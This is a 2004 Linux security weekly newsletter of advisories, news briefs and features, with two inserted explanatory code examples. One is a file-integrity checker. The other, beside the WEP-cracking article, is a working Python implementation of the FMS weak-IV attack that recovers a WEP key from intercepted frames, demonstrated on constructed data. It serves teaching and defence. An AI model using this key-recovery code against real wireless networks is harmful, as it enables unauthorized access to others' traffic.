This week, perhaps the most interesting articles include "," "SAML: The Secret to Centralized Identity Management," and "Students Uncover Dozens of Unix Software Flaws."


Internet Productivity Suite: Open Source Security - Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design. Click to find out more!

LINUX ADVISORY WATCH - This week, advisories were released for hpsockd, viewcvs, nfs-utils, cyrus-imapd, netatalk, gaim, rhpl, ttfonts, mc, udev, gnome-bluetooth, rsh, mysql, libpng, glib, gtk, postgresql, shadow-utils, perl, mirrorselect, drakxtools, dietlibc, gzip, rp-pppoe, openssl, ImageMagick, samba, and cups. The distributors include Debian, Fedora, Gentoo, Mandrake, Red Hat, SuSE, Trustix, and Turbolinux.

LinuxSecurity.com Feature Extras:

Vincenzo Ciaglia Speaks Security 2004 - Vincenzo Ciaglia of Linux Netwosix talks about this year of Linux Security. A full immersion in the world of Linux Security from many sides and points of view.

Mass deploying Osiris - Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for each client; at a scheduled time it sends the configuration to the client, which runs a scan and returns the results to the server, where they are compared against the stored database. Any changes are then sent by e-mail, if configured, to a system administrator or group of people. All communication takes place over an encrypted channel.

AIDE and CHKROOTKIT - Network security continues to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis. In this article I show how to approach security using AIDE and chkrootkit.
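The Osiris and AIDE items above describe the same mechanism: record a digest and metadata for every file, keep that baseline somewhere the monitored host cannot rewrite, rescan later and report the differences. The Python below is an added example written for this newsletter page, not Osiris or AIDE code; the directory tree, file contents and tampering steps are constructed for the demonstration, and the field list (SHA-256, mode, uid, gid, size) is an assumption about what a scanner should track, not a copy of either tool's configuration.

```python
"""
Minimal host-based file-integrity check in the spirit of Osiris and AIDE:
baseline a tree, store the baseline, rescan and report what was added,
removed or changed.  Added example; not Osiris or AIDE code.
"""
import hashlib
import json
import os
import shutil
import stat
import tempfile

# Fields tracked per file (an assumption for this example).
TRACKED = ("sha256", "mode", "uid", "gid", "size")


def file_record(path):
    """Content digest plus the metadata an integrity scanner typically tracks.
    Size alone is not enough: a trojaned binary is often padded to the same
    length, which is why the digest is the field that matters most."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size}


def scan(root):
    """Walk root; return {relative path: record} for every regular file.
    Paths use '/' so a database built on one host compares cleanly elsewhere."""
    db = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(full).st_mode):   # skip symlinks, devices
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                db[rel] = file_record(full)
    return db


def compare(baseline, current):
    """Return (added, removed, changed); changed maps path -> changed fields."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for path in sorted(set(baseline) & set(current)):
        diffs = [k for k in TRACKED if baseline[path][k] != current[path][k]]
        if diffs:
            changed[path] = diffs
    return added, removed, changed


def demo():
    """Constructed scenario (files and contents made up for this example):
    baseline a small tree, tamper with it, rescan against the stored baseline."""
    root = tempfile.mkdtemp(prefix="fim-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"original binary\n")
        with open(os.path.join(root, "passwd"), "wb") as f:
            f.write(b"root:x:0:0::/root:/bin/sh\n")
        baseline = json.dumps(scan(root))       # what the server would store

        # Tamper: same-size trojan that gains the setuid bit, a new file,
        # and a deleted file.
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"trojaned binary\n")
        os.chmod(os.path.join(root, "bin", "ls"), 0o4755)
        with open(os.path.join(root, "bin", "sh"), "wb") as f:
            f.write(b"shell\n")
        os.remove(os.path.join(root, "passwd"))

        return compare(json.loads(baseline), scan(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    added, removed, changed = demo()
    print("added:  ", added)     # ['bin/sh']
    print("removed:", removed)   # ['passwd']
    print("changed:", changed)   # {'bin/ls': ['sha256', 'mode']}
```

The trojaned binary is deliberately the same size as the original, so only the digest and the new setuid bit give it away. In a deployment of the kind the Osiris item describes, the JSON baseline lives on the server and the client only ever returns scan results, so a compromised host cannot quietly rewrite its own database to hide the change.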

Bulletproof Virus Protection - Protect your network from costly security breaches with Guardian Digital’s multi-faceted security applications. More than just an email firewall, on demand and scheduled scanning detects and disinfects viruses found on the network. Click to find out more!

Take advantage of our Linux Security discussion list! This mailing list is for general security-related questions and comments. To subscribe, send an e-mail with "subscribe" as the subject.

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.


Zero Viruses In 2005?
17th, December, 2004

'Tis the season for some holiday cheer. It's also the time of year to reflect on the good security choices you've made over the year, the defense-in-depth strategy that you've decided to follow, and still be able to go home at night and have time for your wife and children.

Linux has fewer bugs, analysis shows
14th, December, 2004

Linux has fewer bugs than typical commercial software, says testing tools vendor Coverity. The company says the 2.6 Linux kernel has one bug for every 5,787 lines of code, compared to the commercial software norm of one bug per 40 lines. Coverity markets source code analysis software, including a product called SWAT that "simulates the effects that the operations in the source code might have" in runtime environments. The company says this approach finds more potentially disastrous bugs than competing code analysis tools that simply scan for known, dangerous coding patterns and sloppy coding constructs.

PGP Corporation Co-Sponsors HIPAA Educational Series
14th, December, 2004

"There is no single solution to the complex issues of security compliance under the HIPAA regulations," noted Dr. Braithwaite. "But there are certain best practices that every organization should follow. Employing encryption technologies in situations where the risk of a security breach is significant is an important core component of these solutions."

news/organizations-events/pgp-corporation-co-sponsors-hipaa-educational-series

Kenai Systems Focuses on Web Services Vulnerabilities With Release Of Two Products
16th, December, 2004

Kenai Systems Inc., a maker of Web services vulnerability tools, today announced the release of two products: eXamine, and eXamineST. The products enable developers to import WSDL files and test them for Web services security vulnerabilities.

news/vendors-products/kenai-systems-focuses-on-web-services-vulnerabilities-with-release-of-two-products

Security research suggests Linux has fewer flaws
14th, December, 2004

The Linux operating system has many times fewer bugs than typical commercial software, according to an upcoming report. The conclusion is the result of a four-year research project conducted by code-analysis company Coverity, which plans to release its report on Tuesday. The project found 985 bugs in the 5.7 million lines of code that make up the latest version of the Linux core operating system, or kernel. A typical commercial program of similar size usually has more than 5,000 flaws or defects, according to data from Carnegie Mellon University.

Linux, Security Certifications Gain Popularity
14th, December, 2004

CertCities.com, a leading Web site for IT certifications, this week unveiled its annual predictions for 2005's hottest certifications. To no one's surprise, Cisco's high-level CCIE (Cisco Certified Internetwork Expert) garnered the most interest from IT certification seekers for 2005. Microsoft's MCSE (Microsoft Certified Systems Engineer) with a sub-specialization in security came in a close second.

Study: Linux the Safest Out There
15th, December, 2004

A new study has found that Linux is more secure than most commercial software -- results that echo what its proponents have long said.

Fashion-Technology Fusion Threatens Security
15th, December, 2004

Employers need thoughtful policies to control which fashionable personal tech items they'll allow on the premises.

Bali bomber writes How-To
16th, December, 2004

But tucked into the back of the 280-page book is a chapter of an entirely different cast, titled "Hacking, Why Not?" There, Samudra urges fellow Muslim radicals to take the holy war into cyberspace by attacking U.S. computers, with the particular aim of committing credit card fraud, called "carding." The chapter provides an outline on getting started.

SAML: The Secret to Centralized Identity Management
17th, December, 2004

Complicated by too many systems, too many applications, and too many passwords, identity management is a major headache for most organizations. Can an intelligent, Web-services approach employing new standards ride to the rescue?

news/privacy/saml-the-secret-to-centralized-identity-management

DirecTV hacker sentenced to seven years
13th, December, 2004

A Canadian man was sentenced to seven years in a U.S. prison this week after admitting he led a sophisticated satellite TV piracy ring that produced and sold thousands of hacked smart cards in the U.S. and Canada.

news/government/directv-hacker-sentenced-to-seven-years

Cyber-Security Office Calls for More Clout
15th, December, 2004

The office in charge of cyber-security in the Department of Homeland Security is planning to continue moving ahead on the agenda the agency has already set.

news/government/cyber-security-office-calls-for-more-clout

Feds Failing To Protect Against Cybersecurity Threats
16th, December, 2004

Attention to cybersecurity has gone from one extreme to the other. Soon after 9/11, the news media was filled with shrieking and arm-waving about "cyberterrorism." Eventually, sensible people realized that the notion of cyberterrorism is just plain silly. Terrorists are interested in being terrifying, they want to set off bombs and send bodies flying and blood flowing.

news/government/feds-failing-to-protect-against-cybersecurity-threats

DHS cyber security lagging
17th, December, 2004

The U.S. Department of Homeland Security is having some homeland cyber security issues on its systems providing remote access to telecommuters, according to a newly-released report by the DHS Inspector General's office.

news/government/dhs-cyber-security-lagging

Students uncover dozens of Unix software flaws
16th, December, 2004

Students of iconoclastic computer scientist Daniel Bernstein have found some 44 security flaws in various Unix applications, according to a list of advisories posted online. The flaws, which range from minor slipups in rarely used applications to more serious vulnerabilities in software that ships with most versions of the Linux operating system, were found as part of Bernstein's graduate level course at the University of Illinois at Chicago.

news/hackscracks/students-uncover-dozens-of-unix-software-flaws

Securing Wireless E-Records
13th, December, 2004

Few understand how tough it can be to lock down wireless networks better than Stephen Lewack, director of technical services and communications at Columbus Regional Healthcare System. Lewack is protecting a growing number of wireless devices throughout the Georgia hospital, which includes more than 400 in-patient beds, more than 200 long-term care beds, and a pharmacy.

WEP: Dead Again, Part 1
15th, December, 2004

This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.
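The KoreK statistical attacks the article compares generalize the Fluhrer, Mantin and Shamir (FMS) correlation in RC4's key schedule: WEP prepends a 24-bit IV to the secret key, so for certain IVs the first keystream byte leaks the next unknown key byte about one time in twenty, and an attacker who knows the first plaintext byte (the 0xAA that opens every LLC/SNAP header) can vote across many frames. The simulation below, written for this page and not taken from aircrack, WepLab or any tool the article reviews, plays both sides: a constructed 40-bit key encrypts constructed frames, and the attacker recovers the key one byte at a time from "resolved" IVs. The key, the IV pattern, the frame count and the candidate width are assumptions; only the FMS correlation is implemented, not the additional KoreK ones.

```python
"""
Simulation of the Fluhrer, Mantin and Shamir (FMS) weak-IV attack on WEP.
Added example; not code from any tool named in the article.  The key, IVs
and frames are constructed here.
"""
import random

SNAP = 0xAA      # first plaintext byte of every WEP data frame (LLC/SNAP header)
IV_LEN = 3
KEY_LEN = 5      # 40-bit WEP; the per-frame RC4 key is IV || secret


def ksa(key):
    """RC4 key-scheduling algorithm; returns the permutation S."""
    S, j, n = list(range(256)), 0, len(key)
    for i in range(256):
        j = (j + S[i] + key[i % n]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4(key, data):
    """Plain RC4 encryption; also used to sanity-check the schedule above."""
    S, i, j, out = ksa(key), 0, 0, bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_first_byte(secret, iv):
    """Victim's side: first ciphertext byte of a WEP frame under IV || secret."""
    return rc4(list(iv) + list(secret), bytes([SNAP]))[0]


def fms_candidate(iv, known, first_ct):
    """Attacker's side.  Replay the KSA over the IV plus the key bytes already
    recovered (prefix of length t).  If the IV is 'resolved' (S[1] < t and
    S[1] + S[S[1]] == t), the first keystream byte equals S[t] after step t
    with probability about 5%, which yields j_t and, from
    j_t = j + S[t] + K[t], the key byte.  Returns a candidate or None."""
    prefix = list(iv) + list(known)
    t = len(prefix)
    S, j = list(range(256)), 0
    for i in range(t):
        j = (j + S[i] + prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if not (S[1] < t and (S[1] + S[S[1]]) & 0xFF == t):
        return None
    z = first_ct ^ SNAP                  # known plaintext -> keystream byte
    return (S.index(z) - j - S[t]) & 0xFF


def fms_votes(frames, known):
    """Tally candidate bytes for position len(known) over all frames."""
    votes = [0] * 256
    for iv, ct in frames:
        c = fms_candidate(iv, known, ct)
        if c is not None:
            votes[c] += 1
    return votes


def fms_recover(frames, key_len=KEY_LEN, width=3):
    """Recover the key byte by byte.  The statistic is noisy, so keep the
    `width` best-voted candidates per position and confirm a complete key
    against a few frames (the known-plaintext check real tools also do)."""
    check = frames[:8]

    def verify(key):
        return all(wep_first_byte(key, iv) == ct for iv, ct in check)

    def search(known):
        if len(known) == key_len:
            return bytes(known) if verify(known) else None
        votes = fms_votes(frames, known)
        for cand in sorted(range(256), key=lambda c: -votes[c])[:width]:
            hit = search(known + [cand])
            if hit:
                return hit
        return None

    return search([])


def capture(secret, n_random=2000, seed=1):
    """Constructed capture: the classic FMS IV class (t, 255, x) for every key
    position, plus random IVs, since tools test each IV they see for the
    resolved condition rather than waiting for one fixed pattern."""
    rng = random.Random(seed)
    frames = [((IV_LEN + a, 255, x), wep_first_byte(secret, (IV_LEN + a, 255, x)))
              for a in range(len(secret)) for x in range(256)]
    for _ in range(n_random):
        iv = tuple(rng.randrange(256) for _ in range(IV_LEN))
        frames.append((iv, wep_first_byte(secret, iv)))
    return frames


SECRET = bytes([0x1F, 0xC3, 0x5A, 0x80, 0x7E])   # constructed 40-bit WEP key

if __name__ == "__main__":
    print(fms_recover(capture(SECRET)).hex())   # 1fc35a807e
```

The attacker never needs more than the IV and the first ciphertext byte of each frame, which is why passive collection suffices. Because a resolved IV gives the right byte only about one time in twenty, the example keeps the three best-voted candidates per position and confirms the assembled key against a handful of frames; a single pass that always takes the top vote works most of the time on a few thousand frames but occasionally commits to a wrong byte, and the KoreK correlations exist to squeeze more votes out of the same traffic.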

Wi-Fi Hacker Sentenced To Nine Years
17th, December, 2004

A 21-year-old Michigan man was sentenced Wednesday to nine years in prison for breaking into the network of home improvement retailer Lowe's, the longest jail term ever handed out in the U.S. for hacking.